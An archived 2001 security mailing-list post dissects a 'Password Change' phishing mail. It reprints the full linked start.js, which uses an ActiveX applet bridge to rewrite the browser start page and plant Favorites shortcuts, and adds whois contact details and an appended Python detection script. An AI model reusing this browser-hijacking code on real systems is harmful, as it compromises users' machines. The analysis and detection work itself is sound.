There appears to be a new Hotmail malware thingy. It is sent from admin02at_private with the subject line of "Password Change". Wonder how many people it will get before all the sites are closed?

Detail - I just received this mail from 202.104.122.157 [1]

#START
>From admin02at_private Thu, 09 Aug 2001 18:21:54 -0700
Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28 -0700
Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
From: admin02at_private
To: ${MYEMAIL}@hotmail.com
Subject: Password Change
Date: Sat, 8 Sep 2001 08:13:32
Mime-Version: 1.0
Content-Type: text/html; charset="DEFAULT_CHARSET"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700

<HTML>
<HEAD>
</HEAD>
<BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B" ALINK="#FF0000">
<P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change Confirmation</B></FONT> </P>
<P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully changed. Please remember your new Password.
</B></FONT></P>
<P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this please click here to restore your old password.</A></FONT> </P>
</BODY>
</HTML>
#END

Now going to maeveshomepage.com/ty.htm [2] in Opera shows

#START
<!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO 5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY BGCOLOR="#336699">
<P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P>
<P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been restored.</FONT>
<SCRIPT SRC="start.js"> </SCRIPT>
</P>
</BODY>
</HTML>
#END

and looking at start.js (the interesting bit)

#START
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")

function AddFavLnk(loc, DispName, SiteURL)
{
  var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
  Shor.TargetPath = SiteURL;
  Shor.Save();
}

function f(){
  try
  {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try{
      var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
      document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      /////////////////////////////////////////////////////////////////////////////// Home page
      Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/");
      var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
      document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      var WF, Shor, loc;
      WF = FSO.GetSpecialFolder(0);
      loc = WF + "\\Favorites";
      if(!FSO.FolderExists(loc))
      {
        loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
        if(!FSO.FolderExists(loc))
        {
          return;
        }
      }
      /////////////////////////////////////////////////////////////////////////////// Favorites
      AddFavLnk(loc, " Britney Spears Nude", "http://www.celebrities-revealed.com");
      AddFavLnk(loc, " Aol", "http://www.aol.com");
    }
    catch(e){
    }
  }
  catch(e){
  }
}

function init(){
  setTimeout("f()", 1000);
}
init();
#END

It appears to set your default home page to http://yahhooo.devil.ru/ [3] and get your favorites (which may contain saved usernames and passwords). Anybody got anything further?

Q

Notes

[1] -
inetnum: 202.104.122.128 - 202.104.122.159
netname: SHENZHEN-JLXXCY-INFOR-LTD
descr: SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD
country: CN
admin-c: HB58-AP
tech-c: HB58-AP
mnt-by: MAINT-CHINANET-GD
changed: ipadmat_private 20000920
source: APNIC

person: HU BOG
address: F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN
country: CN
phone: +86-755-3521135
fax-no: +86-755-3396971
e-mail: ipuserat_private
nic-hdl: HB58-AP
mnt-by: MAINT-CHINANET-GD
changed: ipadmat_private 20000920
source: APNIC

[2] -
Registrant:
JBO
223 S. 5th
usa, O ---
US

Domain Name: MAEVESHOMEPAGE.COM

Administrative Contact:
I, TJ bwestbyat_private
223 S. 5th
usa, O ---
US
1115551212

Technical Contact:
I, TJ bwestbyat_private
223 S. 5th
usa, O ---
US
1115551212

Billing Contact:
I, TJ bwestbyat_private
223 S. 5th
usa, O ---
US
1115551212

Record last updated on 11-Jul-2001.
Record expires on 07-May-2002.
Record Created on 07-May-2001.

Domain servers in listed order:
NS1.VEGASSECURE.NET 208.50.15.6
NS2.VEGASSECURE.NET 208.50.15.7

[3] -
domain: DEVIL.RU
type: CORPORATE
admin-o: AK2000-RIPN
nserver: ns.kravchenko.ru.
nserver: srvr.list.ru.
created: 07-AUG-2000
state: Delegated
changed: 19-MAY-2001
mnt-by: ANDRIUSHA-MNT-RIPN
source: RIPN

person: Andrey S Kravchenko
nic-hdl: AK2000-RIPN
address: Teatralny st 23a/30,
address: Donetsk, Ukraine, 340100
phone: +7 902 6010000
fax-no: +7 902 6010000
e-mail: andreyat_private
changed: 18-AUG-2000
mnt-by: ANDRIUSHA-MNT-RIPN
source: RIPN

--
#####################
Quentyn Taylor
Sysadmin - Fotango
#####################
You're damn right we need a rational code of morality and ethics. But not much progress can be made in that direction while we've still got a majority ranting about gods, devils, souls, and absolute morality, and using an ancient book written by ignorant nomads as a guide.
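The following is an added triage script, not code from the post above or from any of the sites it names. It shows what a defender would check offline when handed a mail like this one and the page it links to: the script scanner looks for the markers visible in the posted start.js (the com.ms.activeX.ActiveXComponent applet, setCLSID() calls naming scripting-host COM classes, a RegWrite to the IE "Start Page" value, and .URL shortcuts dropped into Favorites), and the header check pulls the injecting IP out of the top Received: header and measures how far the Date: header disagrees with it. The CLSID-to-ProgID table uses the three CLSIDs from the posted script; the rule names, severities and the "two high hits = malicious" threshold are my own choices, and the sample mail and scripts are constructed for the test (the headers are the ones quoted in the post, the script is a trimmed copy of its shape with a placeholder URL).

```python
"""Offline triage of a suspicious "password change" mail and the script it links to."""
import re
from datetime import timezone
from email import message_from_string
from email.utils import parsedate_to_datetime

# The three CLSIDs from the posted start.js and the COM classes they resolve to.
KNOWN_CLSIDS = {
    "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Shell",
    "{0D43FE01-F093-11CF-8940-00A0C9054228}": "Scripting.FileSystemObject",
    "{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Network",
}

# (rule name, pattern, severity). JS string literals escape backslashes ("\\Main"),
# so "\\+" in the pattern matches one or more literal backslashes.
RULES = [
    ("activex_applet", re.compile(r"com\.ms\.activeX\.ActiveXComponent", re.I), "high"),
    ("setclsid", re.compile(r"\.setCLSID\s*\(\s*['\"](\{[0-9A-F-]{36}\})['\"]", re.I), "high"),
    ("regwrite_startpage",
     re.compile(r"\.RegWrite\s*\(.*Internet Explorer\\+Main\\+Start Page", re.I), "high"),
    ("create_shortcut", re.compile(r"\.CreateShortcut\s*\(", re.I), "medium"),
    ("favorites_dir", re.compile(r"\\+Favorites", re.I), "low"),
]

RECEIVED_IP = re.compile(r"from\s+\[?(\d{1,3}(?:\.\d{1,3}){3})\]?", re.I)


def scan_script(text):
    """Return a verdict, the distinct rule hits and each CLSID resolved to a ProgID."""
    hits = set()
    clsids = {}
    for name, rx, severity in RULES:
        for m in rx.finditer(text):
            hits.add((name, severity))
            if name == "setclsid":
                clsid = m.group(1).upper()
                clsids[clsid] = KNOWN_CLSIDS.get(clsid, "unknown")
    high = sum(1 for _, sev in hits if sev == "high")
    verdict = "malicious" if high >= 2 else ("suspicious" if hits else "clean")
    return {"verdict": verdict, "hits": sorted(hits), "clsids": clsids}


def _as_utc(stamp):
    """Parse an RFC 822 date; a missing zone (as in the posted Date:) is taken as UTC."""
    d = parsedate_to_datetime(stamp)
    return d if d.tzinfo else d.replace(tzinfo=timezone.utc)


def triage_headers(raw_mail):
    """Origin IP from the top Received: header (written by the receiving MX, so the one
    to trust) and the Date: vs Received: skew in days; a large skew means a forged Date:."""
    msg = message_from_string(raw_mail)
    received = msg.get_all("Received") or []
    origin_ip = None
    for hop in received:
        m = RECEIVED_IP.search(hop)
        if m:
            origin_ip = m.group(1)
            break
    skew_days = None
    if received and msg.get("Date"):
        stamp = received[0].rsplit(";", 1)[-1].strip()
        skew_days = abs(_as_utc(msg["Date"]) - _as_utc(stamp)).days
    return {"origin_ip": origin_ip, "date_skew_days": skew_days}


# Constructed test input: headers as quoted in the post, body trimmed.
SAMPLE_MAIL = """Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28 -0700
Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
From: admin02at_private
Subject: Password Change
Date: Sat, 8 Sep 2001 08:13:32
Content-Type: text/html; charset="DEFAULT_CHARSET"

<HTML><BODY>Password Change Confirmation</BODY></HTML>
"""

# Constructed test input: the shape of the posted start.js with a placeholder URL.
SAMPLE_SCRIPT = r"""
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
function f(){
  a1=document.applets[0];
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject();
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject();
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://placeholder.invalid/");
  loc = FSO.GetSpecialFolder(0) + "\\Favorites";
  var Shor = Shl.CreateShortcut(loc + "\\x.URL"); Shor.Save();
}
"""

# Constructed benign control: a cookie and a timer, nothing that reaches COM.
BENIGN_SCRIPT = 'document.cookie = "seen=1; path=/"; setTimeout("init()", 1000);'

if __name__ == "__main__":
    print(scan_script(SAMPLE_SCRIPT))
    print(scan_script(BENIGN_SCRIPT)["verdict"])
    print(triage_headers(SAMPLE_MAIL))
```

Run against the posted headers this reports the origin as 202.104.122.157 (the address the author looked up in note [1]) and a Date: header roughly a month ahead of the Received: stamp, which on its own is a strong phishing indicator; the script scanner resolves the first two CLSIDs to WScript.Shell and Scripting.FileSystemObject, the pair that gives a page registry and file-system access through the MS JVM applet bridge.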
This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 11:58:28 PDT